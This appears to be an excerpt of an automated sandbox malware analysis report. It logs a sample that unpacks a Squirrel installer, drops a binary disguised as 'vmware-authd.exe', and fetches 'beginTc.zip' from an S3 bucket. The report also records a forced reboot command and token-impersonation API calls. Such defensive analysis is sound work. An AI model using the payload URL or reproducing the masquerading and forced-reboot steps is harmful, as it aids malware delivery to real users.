Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: ThirdPartyNotices.txt.8.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://www.vmware.com/0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://www.vmware.com/0/
Source: MpSvc.dll.8.dr	String found in binary or memory: https://aka.ms/NpBhFeedbackSinkholeMalicious-
Source: MpSvc.dll.8.dr	String found in binary or memory: https://aka.ms/NpFeedbackunknownA
Source: Update.exe	String found in binary or memory: https://api.github.com/#
Source: ThirdPartyNotices.txt.8.dr	String found in binary or memory: https://github.com/Microsoft/cpprestsdk.
Source: ThirdPartyNotices.txt.8.dr	String found in binary or memory: https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)
Source: Update.exe	String found in binary or memory: https://github.com/myuser/myrepo
Source: vmware-authd.exe, 00000008.00000003.2120194531.0000000003090000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.0000000003090000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117689030.0000000003092000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.0000000003089000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.0000000003092000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.0000000003092000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: vmware-authd.exe, 00000008.00000003.2108854598.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2112499057.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120322191.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.000000000304D000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121275803.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117823557.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115939795.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107217328.000000000304C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/
Source: vmware-authd.exe, 00000008.00000003.2108854598.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2112499057.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120322191.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.000000000304D000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121275803.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117823557.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115939795.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107217328.000000000304C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/C
Source: vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000002.3263091725.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.0000000003090000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2092316872.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.0000000003090000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117689030.0000000003092000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.0000000003092000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.0000000003092000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zip
Source: vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2092316872.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipC:
Source: vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2092316872.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipL
Source: vmware-authd.exe, 00000008.00000003.2108854598.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2112499057.000000000304E000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120322191.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121275803.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2117823557.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115939795.000000000304C000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107217328.000000000304C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipUUC:
Source: vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipf
Source: vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.ziph
Source: vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipt
Source: vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://special-edition32093201.s3.sa-east-1.amazonaws.com/beginTc.zipu
Source: NisSrv.exe.8.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
Source: NisSrv.exe.8.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
Source: NisSrv.exe.8.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.usffl4unknownUriunsupportedserverCalluserActionhttps://europe.
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 3.5.232.185:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\shutdown.exe shutdown.exe -r -t 1 -f

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_00486EA0 memset,EnterCriticalSection,EnterCriticalSection,memcpy,LeaveCriticalSection,GetTokenInformation,GetLastError,Warning,GetTokenInformation,EqualSid,LeaveCriticalSection,Warning,Warning,free,free,DuplicateTokenEx,GetLastError,free,free,AllocateAndInitializeSid,GetLastError,Warning,SetTokenInformation,GetLastError,Warning,FreeSid,free,free,Warning,GetLastError,free,ImpersonateLoggedOnUser,GetLastError,Warning,GetLastError,free,_stricmp,free,free,Warning,Warning,CreateProcessAsUserW,free,free,GlobalMemoryStatusEx,GetLastError,free,free,SetProcessWorkingSetSize,GetLastError,ResumeThread,CloseHandle,free,free,GetLastError,GetCurrentProcess,IsWow64Process,GetTokenInformation,GetLastError,Warning,free,free,Warning,Warning,free,free,free,free,free,free,Warning,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,

4_2_00486EA0

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F938F8	0_2_00F938F8
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9F9B5	0_2_00F9F9B5
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F942C9	0_2_00F942C9
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FABAA4	0_2_00FABAA4
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FA83D8	0_2_00FA83D8
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FABBC8	0_2_00FABBC8
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FACEE1	0_2_00FACEE1
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9465F	0_2_00F9465F
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F92FF0	0_2_00F92FF0
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9F781	0_2_00F9F781
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F95758	0_2_00F95758
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FA7F40	0_2_00FA7F40
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F96702	0_2_00F96702
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FF848F3694D	3_2_00007FF848F3694D
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FF848F10F18	3_2_00007FF848F10F18
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FF848F10F25	3_2_00007FF848F10F25
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FF848F3337D	3_2_00007FF848F3337D
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FF848F343E0	3_2_00007FF848F343E0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_00485C70	4_2_00485C70
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_00484D00	4_2_00484D00
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0E5E30	4_2_6E0E5E30
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0CEEA0	4_2_6E0CEEA0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0FBEB7	4_2_6E0FBEB7
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0EDCA0	4_2_6E0EDCA0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0D5D80	4_2_6E0D5D80
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0CEDA0	4_2_6E0CEDA0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E114A56	4_2_6E114A56
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E114B76	4_2_6E114B76
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0CCBB0	4_2_6E0CCBB0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0E6BF0	4_2_6E0E6BF0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0CE870	4_2_6E0CE870
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0E7870	4_2_6E0E7870
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E1018E0	4_2_6E1018E0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0CD930	4_2_6E0CD930
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0F494C	4_2_6E0F494C
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0ED620	4_2_6E0ED620
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E103790	4_2_6E103790
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0E7424	4_2_6E0E7424
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0E8500	4_2_6E0E8500
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0E65C0	4_2_6E0E65C0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0E7200	4_2_6E0E7200
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E110281	4_2_6E110281
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0F62E7	4_2_6E0F62E7
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E10033B	4_2_6E10033B
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E10D379	4_2_6E10D379
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0DA040	4_2_6E0DA040
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0FC0E9	4_2_6E0FC0E9
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0DB150	4_2_6E0DB150
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0ED1D0	4_2_6E0ED1D0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E3BA6F8	4_2_6E3BA6F8
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E3B8D5F	4_2_6E3B8D5F
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E3B3320	4_2_6E3B3320

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe 545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll 7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft.NET\EppManifest.dll 11E886100FCCE403D98866CDF32A9DE5FE010DFC092B17B0A05D2598C6822CF8

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: String function: 004893B4 appears 49 times
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: String function: 004827C0 appears 89 times
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: String function: 00483B70 appears 41 times
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: String function: 6E0F03B0 appears 63 times
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: String function: 00F9B010 appears 36 times

Source: 0923840932020004-3-0.exe	Static PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: NisSrv.exe.8.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: MpEvMsg.dll.mui.8.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.8.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.8.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll.mui0.8.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.8.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll.8.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.8.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll.8.dr	Static PE information: No import functions for PE file found
Source: shellext.dll.mui0.8.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll.mui.8.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.8.dr	Static PE information: No import functions for PE file found
Source: shellext.dll.mui.8.dr	Static PE information: No import functions for PE file found
Source: MsMpRes.dll.mui0.8.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll0.8.dr	Static PE information: No import functions for PE file found
Source: MsMpRes.dll.mui.8.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.8.dr	Static PE information: No import functions for PE file found
Source: OfflineScannerShell.exe.mui0.8.dr	Static PE information: No import functions for PE file found
Source: OfflineScannerShell.exe.mui.8.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.8.dr	Static PE information: No import functions for PE file found
Source: MsMpRes.dll.8.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.8.dr	Static PE information: No import functions for PE file found

Source: 0923840932020004-3-0.exe, 00000001.00000003.2014310381.000000000171F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUpdate.exe2 vs 0923840932020004-3-0.exe
Source: 0923840932020004-3-0.exe, 00000001.00000003.2014310381.0000000001711000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUpdate.exe2 vs 0923840932020004-3-0.exe
Source: 0923840932020004-3-0.exe	Binary or memory string: OriginalFilenameSetup.exe. vs 0923840932020004-3-0.exe

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
